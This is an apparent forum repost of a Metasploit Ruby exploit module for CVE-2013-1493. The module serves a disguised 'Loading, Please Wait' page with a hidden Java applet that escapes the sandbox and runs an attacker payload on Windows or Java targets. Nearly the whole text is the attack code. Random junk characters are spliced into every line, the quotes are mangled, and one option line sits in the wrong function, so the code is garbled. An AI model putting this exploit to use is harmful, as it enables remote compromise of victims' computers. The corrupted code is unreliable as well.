##
( J$ s8 [6 {+ F5 j/ i# @" x
- S. e- g: W9 x" A: z% W# This file is part of the Metasploit Framework and may be subject to
6 @5 m5 P) [! a+ ?- E# redistribution and commercial restrictions. Please see the Metasploit& g& [5 J$ u+ L/ t
# web site for more information on licensing and terms of use.
* [! p. \- b3 i, L! P' J# F# http://metasploit.com/
5 W8 Y/ a+ [# j##- y2 `! o: B; Y5 _: e
require ‘msf/core’0 ?! }; v* t$ ? u8 }+ s& ^
require ‘rex’; J/ o$ b* g2 F" }6 j" k
class Metasploit3 < Msf::Exploit::Remote
% f0 Y) E5 m, l9 {; XRank = NormalRanking
9 q6 ?6 j7 P3 `include Msf::Exploit::Remote::HttpServer::HTML
$ i" _ b1 Z! O" V: z8 ~include Msf::Exploit::EXE; Z" }8 | F7 F3 \+ U9 r! C
include Msf::Exploit::Remote::BrowserAutopwn
2 H, O- E. @+ w6 Cautopwn_info({ :javascript => false })
) i O4 i. x4 ?" a" Zdef initialize( info = {} ). y! @) C9 z' k, z6 d% |+ i( T
super( update_info( info,
# H2 \$ P* ?0 U7 V% M; _8 I‘Name’ => ‘Java CMM Remote Code Execution’,, d' E/ K2 v& U! Z! O+ G) \
‘Description’ => %q{
! D7 s# i# B3 A: B- c2 DThis module abuses the Color Management classes from a Java Applet to run
3 Q: Y! m& J8 S4 Y. s7 i. farbitrary Java code outside of the sandbox as exploited in the wild in February. [) |6 [: Z; B- A0 }- e' V: D4 B; _% {
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
|, J4 R' Y1 C! t2 W2 o) L h$ Xand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
- K" U" }7 @9 I" ?* Nsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
) G6 T3 P0 r& @2 ywarning in order to run the malicious applet.: o$ q6 i0 s Y" ~/ S( O
},. z$ s% c0 x+ k( `; @
‘License’ => MSF_LICENSE,* f- q: i6 `- ?, l+ o
‘Author’ =>& g% Q8 a8 ^7 E4 W; r: m
'Unknown', # Vulnerability discovery and Exploit; q4 @( L. B* K1 }5 W
'juan vazquez' # Metasploit module (just ported the published exploit)- |4 D- E0 _8 y
],
) H) b& e4 j y) v3 P3 H‘References’ =>3 Y% r/ v" i$ V& x7 S9 D3 k
[* [# ?" Y9 e8 Z- t
[ 'CVE', '2013-1493' ],
" \: t5 D& b* R& l9 D% J: R4 q[ 'OSVDB', '90737' ],
! x/ s8 D/ r7 l$ C: L9 n[ 'BID', '58238' ],
. X1 ~1 Y! K7 R8 C% K[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
o" y& b( x9 M5 ?8 H1 {1 |( _! K" v+ x[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],/ j* z; n1 h+ E* N2 K) q/ ~% b7 A+ j
[ 'URL', 'http://pastie.org/pastes/6581034' ]
7 Y, p) J) W H$ F' b0 N0 h/ W8 x],
6 x0 J* {! y- Z7 C1 P' N! B3 |3 S‘Platform’ => [ 'win', 'java' ],
' m& _% H3 p* Z! C* O‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
9 z$ t6 X" G5 E' ^" X, Q5 u0 R‘Targets’ =>) G' V0 n7 X" }- f& W
[
_/ c* s; L- J% R* {) H g[ 'Generic (Java Payload)',6 s( M( Z- Q( X* z% K3 f; A
{
3 p2 |! n+ G- S4 \'Platform' => 'java',
/ r* B7 d/ s6 Y# i& g'Arch' => ARCH_JAVA
E" ]/ Z5 A2 l3 j t}
3 n4 x2 ?9 C# O1 [- u4 S b2 Y],( g3 }: `# J \. M6 C
[ 'Windows x86 (Native Payload)',9 m: I; p6 b; _7 @5 O5 U$ t+ g6 D
{: G+ j/ {6 Z& U& M; ~ b8 P
'Platform' => 'win',
' v" P/ S. @( L0 i$ E, U# F6 u'Arch' => ARCH_X86% ^0 S! k: S- A$ N+ c( {
}
% \0 ]( z; |- F* k]
* `7 |! H7 d( p( F% j],* t( _" l3 [$ {8 g, B: B' M$ e
‘‘DisclosureDate’ => ‘Mar 01 2013′5 g i9 A2 i! ?
))
: F; @" X( g, y& fend
' |* b; ]. k# S1 |5 j) H, ydef setup7 i+ \2 x8 C! f1 i, q7 D% g
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
9 z7 N- g+ V) t+ Q4 }@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
" e% W! k9 u" c+ R0 Q( ~; e$ ^path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)& P7 ]# H4 h, J5 u0 H P
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
9 h% }- ~0 q( _2 ^* _+ f4 ]path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)8 W7 i% v @/ Z' R8 l
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
+ d* G1 y* o' Ppath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
( G+ R9 h9 }& W4 ]$ C% _@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }6 E/ a, n2 Z1 s, ]/ n/ K! P- T4 ?8 `
@init_class_name = rand_text_alpha(“Init”.length)
& f! D7 d% Y" O4 Z# p* [@init_class.gsub!(“Init”, @init_class_name)
: M; S; Y/ l+ x( Asuper
- u! H$ z% G, a) Xend a( `6 |/ y/ z- q- P' b
def on_request_uri(cli, request)6 @7 r% G& d5 Z! k5 N
print_status(“handling request for #{request.uri}”)
7 v k% h0 M' B9 g! icase request.uri- ]7 i, ~& Z+ h" ^8 _2 O
when /\.jar$/i
7 o2 E5 K! s, r) wjar = payload.encoded_jar$ V' K( h+ T9 l3 ]# Z A
jar.add_file(“#{@init_class_name}.class”, @init_class)
6 c" k" \" U5 L6 K( M# c' Pjar.add_file(“Leak.class”, @leak_class)
3 w/ d+ c# A) _jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
0 _0 e) K. F- g3 S: c! Tjar.add_file(“MyColorSpace.class”, @color_space_class)
5 `* f8 g4 r* I9 LDefaultTarget’ => 1,* N( g2 A; M. u( n% E
metasploit_str = rand_text_alpha(“metasploit”.length)6 X" C$ j" M5 O5 _7 S& J
payload_str = rand_text_alpha(“payload”.length): R7 U0 ~' w# S6 h' @4 K9 z
jar.entries.each { |entry|
/ f1 l8 b7 ~3 W1 s8 E+ d+ J/ rentry.name.gsub!(“metasploit”, metasploit_str)
1 N5 ]* T0 e- I! ?) H8 I3 Tentry.name.gsub!(“Payload”, payload_str): q8 P' ~( {+ a9 b: ^
entry.data = entry.data.gsub(“metasploit”, metasploit_str)3 c: l1 K( x" x/ _$ P7 `) _
entry.data = entry.data.gsub(“Payload”, payload_str)
9 E, p$ S0 K$ ^9 L7 p' x}) S0 B3 w7 L1 e" |( D' N
jar.build_manifest
, m; s B; x) D! O, Q7 hsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })$ h) B. s# B7 L
when /\/$/4 v; z" W) W" f. H
payload = regenerate_payload(cli)8 d2 `% t; S" H; O8 c* I* g; N
if not payload
/ T, ~) L" h) }/ }6 Pprint_error(“Failed to generate the payload.”)
( i/ o- T' `4 _3 c# wsend_not_found(cli)
; L2 b$ a$ E" s% O( p9 Jreturn
& s/ W: {, j; L" x$ u% Vend
) c* t- m0 D( e' esend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ }); Y3 ?: a5 f* {& ^- d/ `5 o i
else/ w* j( i$ l9 v6 _
send_redirect(cli, get_resource() + ‘/’, ”)/ Q; ?/ R! n% B$ \/ W+ Q3 y
end
1 ^5 o: v- M2 U4 m, g* y* ?& Z: kend( H' t G; g% R) b" ^6 ?" T2 Q. H6 h* r
def generate_html) l1 A, c# f0 l
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|* I) A$ J- w# W0 p! ?4 L' m D& D
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|5 u0 }0 U: t9 V* c% P8 @- ^% T
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|; A" H1 M- A1 M! r0 s6 T
html += %Q|</applet></body></html>|
. P- [% t3 X0 ~return html
) q6 f6 Y4 q4 b0 K% iend8 j4 b' j, |% `1 S! D5 s# ~) |
end
9 w. H e( T. G$ X6 [end
9 ]; S: X& D, \: J2 ~0 O |
发表于 2013-4-4 17:31:17
收藏
支持
反对